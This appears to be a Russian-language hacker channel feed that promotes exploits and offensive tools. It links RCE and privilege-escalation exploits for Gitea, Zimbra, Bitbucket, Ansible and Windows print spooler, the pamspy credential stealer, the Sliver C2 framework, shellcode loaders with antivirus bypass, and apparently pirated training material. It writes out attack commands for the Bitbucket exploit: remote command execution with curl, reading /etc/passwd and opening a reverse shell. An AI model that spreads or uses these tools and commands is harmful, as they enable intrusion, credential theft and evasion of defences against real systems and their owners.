Gitea - Remote Code Execution (for version 1.16.6)
CVE-2022-30781 - описание

#exploit

Мы уже постили exploit для CVE-2022-27925 (zimbra)
Вот тот же сплоит, только с реализацией reverseShell (для ленивых)
😋

админам на заметку:
Как быстро раcпарсить RDP логи и понять как авторизовался удаленный юзер (kerberos или NTLM)
Download get-RdpLogonEvent.ps1

#windows #rdp

SecretScanner
Ищем секреты в образах контейнеров или файловых системах.
*
Инструмент автономный, ищет контейнеры и файловые системы хоста, после чего сравнивает найденное с со своей базой данных, в которой на данный момент около 140 секретных типов
Download

#docker #security

pamspy - Воруем учетки в Linux используя eBPF
PAM модулями пользуются многие приложения для аутентификации (sudo, sshd, passwd и так далее), и статей по теме заBACKDOORивания PAM модулей в инете предостаточно.
*
pamspy подгружает пользовательскую программу eBPF, чтобы перехватить функцию pam_get_authtok из libpam.so. И каждый раз когда условный пользователь пытается пройти аутентификацию он дергает pam_get_authtok - тут то pamspy выдернет пароль !
*
DOWNLOAD ——-> pamspy

#linux #pam

Cobalt Strike: и его payloads
Разбираемся что и как, анализируем и декодируем. Хорошая статья, рекомендую !
Read

#cobaltstrike

CVE-2022-36804 - Bitbucket

Для versions <8.3.1 (так как патч уже выпущен)
Сплоит ищет общедоступные репы на хосте

Bitbucket

для исполнения уязвимости.
*
Если открытой репы нет, то требуется действительный файл cookie BITBUCKETSESSIONID.
*
RCE (Remote Code Execution)
CVE-2022-36804.py -e rce --cmd "curl http://example.com/" http://bitbucket.local:7990/

Download /etc/passwd
CVE-2022-36804.py -e download --server-file /etc/passwd http://bitbucket.local:7990/

Reverse_shell
CVE-2022-36804.py -e rev_shell --host 127.0.0.1 --port 31337 http://bitbucket.local:7990/

#bitbucket

ANSIBLE - CVE-2022-2568
LPE exploit download

На фоне печальных новостей про CobaltStrike, некоторые ребята задаются вопросом: "А может заменить этот платный кобальт на что то другое ?"
И такой инструмент ЕСТЬ !
*
Sliver (кроссплатфоменный, опенсорсный, активно развивается)
*
Download\скачать Sliver
Site: Sliver
Video guides: lesson-1, lesson-2, lesson-3
Book: в тему поста тут

😎☠️🎃

В виду снижения общего уровня интеллекта, мы выпустили книгу)))

РуткитоПисателям под windows на заметку !
Custom Kernel Signers

#windows #drivers #rootkit

dll4shell
C++ shellcode launcher
Коллекция оболочек DLL для разных методов внедрения шелл-кода и обфускации (AV bypass).
Основано на реальных событиях на charlotte
DownLoad dll4shell

cve-2022-39197
Та самая XSS найденная в Cobalt Strike 4.7
Еще раз прочитать про дырку
Скачать exploit

#cobaltstrike #exploit

О чем говорит ЦРУ ?!
The Langley Files: A CIA Podcast
Послушать что там несёт директор ЦРУ Уильям Дж. Бернс можно тут )))))

#CIA

Acunetix 14.9.220830118
linux version

#acunetix

CVE-2022-30206
Опять windows, опять print spooler, опять LPE
download exploit

#windows #lpe

Advanced Exploit Development
Курс SANS SEC760
Download 25GB

Hacking books
Подборка для: линуксоидов, виндузоидов, программоидов, хакероидов, сетевикоидов и паранаидоидов)
605 книг в PDF
download

Советую присмотреться и начать мониторить этот блог !
POC для нового метода обхода сканеров памяти
Cronos

Ни мы, ни Народно-освободительная армия Китая, Вам ничего не говорили 🪖
ShellCode_Loader

#shellcode #msf #cobaltstrike

Shift+F10=system
Забавнейший bypass в windows (в перспективе от winXP до win11 )
Дырку microsoft признали, но багой не считают и исправлять не будут )))
*
В общем смешнейший privilge escalation до прав system )))
Читаем вникаем
Смотрим и смеемся

#windows